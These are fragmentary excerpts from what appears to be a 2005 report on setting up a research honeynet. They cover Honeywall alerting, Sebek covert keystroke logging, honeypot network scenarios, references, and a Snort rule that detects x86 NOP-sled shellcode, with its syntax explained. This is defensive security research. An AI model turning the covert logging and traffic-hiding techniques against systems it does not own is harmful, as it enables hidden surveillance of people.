Attain: Open the menu, choose 4 (Honeywall configuration), then 6 (Alerting) and enter an email address.
Sometimes it can be desirable to disable this feature, especially in Scenario I, where the Honeynet is connected to the internet and receives hundreds of alerts an hour. In this case alerting could become too noisy.

R012 Sebek is running
Need: Sebek provides information on malicious activities performed on the Honeypot.
Ex: Sebek could be installed but not configured.
Attain: Install Sebek on the Honeypot and run the configuration utility.
A hacker might use an encrypted connection to the Honeypot; in this case the network dump does not reveal his activities. Sebek secretly logs keystrokes and event messages. It sends the gathered data to a specified MAC address and hides this traffic from the intruder.

5.1.1 Test case template
The following sectio
121. ws Network LP LLLP, released June 20, 2005.
Fyodor (pseudonym), Network Mapper, http://www.insecure.org/nmap/index.html, Insecure Inc., last request June 05, 2005.
The Honeynet Project, Know Your Enemy: Learning about Security Threats, 2nd Edition, Addison Wesley, 2004.
Lance Spitzner et al., The Honeynet Project Research Alliance, http://www.honeynet.org, Honeynet, last request June 25, 2005.
IANA, IANA address database: Internet Protocol v4 address space, http://www.iana.org/assignments/ipv4-address-space, The Internet Assigned Number Authority, last request June 25, 2005.
Author unknown, Intel Architecture Software Developer's Manual, Volume 2: Instruction Set Reference, Intel Corporation, 1997.
Kaspersky Lab, Virus Top Twenty for December 2004, http://www.kaspersky.com/news?id=157640844, Kaspersky Lab, 2005, released Jan 12, 2005.
Dieter Kirchner, Hubert Reßler, Zeitübertragung über Telefonmodems, Verlag Sprache und Technik, 1993.
Page A 1
Citation keys on the following page: Mastercard 05, Microsoft 02, Microsoft 03, Microsoft 05, OSI 94, Priester 04, Provos 02, Roesch 05, RFC 791, RFC 793.
Page A 2
MasterCard News Releases: MasterCard International Identifies Security Breach at CardSystems Solutions, http://www.mastercardinternational.com/cgi-bin/newsRoom.cgi?id=1038, MasterCard International, released June 17, 2005.
Author unknown, Common Internet File System (CIFS) File Access Protocol, vers
122. xperiment based on this scenario recorded approximately 597 packets a second (see appendix B.4, recorded June 19, 2005). Depending on the current propagation of worms in the internet this can be more or less. The monitoring device (the Honeypot or an external monitor) needs enough resources to handle the huge amount of traffic. The type of address of the Honeypot can be public or private (definition of public and private addresses in 3.3 and 3.4). The type of network address the Honeypot is located in is defined in Scenario III resp. Scenario IV. If specifying a setup, Scenario I and II can not occur alone. Both have to be used in conjunction with either Scenario III or Scenario IV. The reason for this is a limitation described in Scenario IV.
3.2 Scenario II: protected environment. In this scenario the Honeypot is connected to the internet by a firewall. The firewall limits the access to the Honeypot: not every port is accessible from the internet, resp. not every IP address on the internet is able to initiate connections to the Honeypot. This scenario does not state the degree of connectivity; it only states that there are some limitations. However, those limitations can be either strict (allowing almost no connection) or loose (only denying a few connections). The firewall can be a standard firewall or a firewall with NAT capabilities (see chapter 3.3). However, a public IP address is always assigned to the firewall.
(figure: Firewall, Honeypot)
123. (figure 5.15: full alert details; recoverable fields: alert "SHELLCODE x86 inc ebx NOOP", Classification: Executable code was detected, Priority: 1, protocol TCP)
The rule which triggered this alert is found in the Snort rules in the file shellcode.rules in the directory /etc/hflowd/snort/rules on the Honeywall. The list after the rule example lists what each entry or keyword is used for.
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE x86 inc ebx NOOP"; content:"CCCCCCCCCCCCCCCCCCCCCCCC"; classtype:shellcode-detect; sid:1390; rev:5;)
figure 5.16: Snort rule for detecting shellcode
alert: Rule action; generate an alert using the selected alert method and then log the packet.
ip: Rule header; specifies the protocol that the rule applies to (7).
$EXTERNAL_NET: Rule header variable specifying information about the source address. In this case the variable was set in /etc/hflowd/snort/snort.conf to any.
figure 5.17: details of a Snort alert
(16) Full Snort flow details can be extracted from rule evaluation by clicking on the magnifying glass icon and choosing rule evaluation.
(7) Currently Snort supports IP, TCP, UDP and ICMP only (see 4.4.1).
Page 57
$SHELLCODE_PORTS: Rule header variable specifying information about t
124. (Appendix B: Records of Roo Die and Roo Mue; figures with detailed results of Roo WinXP and Roo Win2000, aggregated flows by destination between Sun Jun 19 12:00:00 2005 and Mon Jun 20 12:00:00 2005; the table contents on pages B 34 and B 35 are not recoverable from the scan)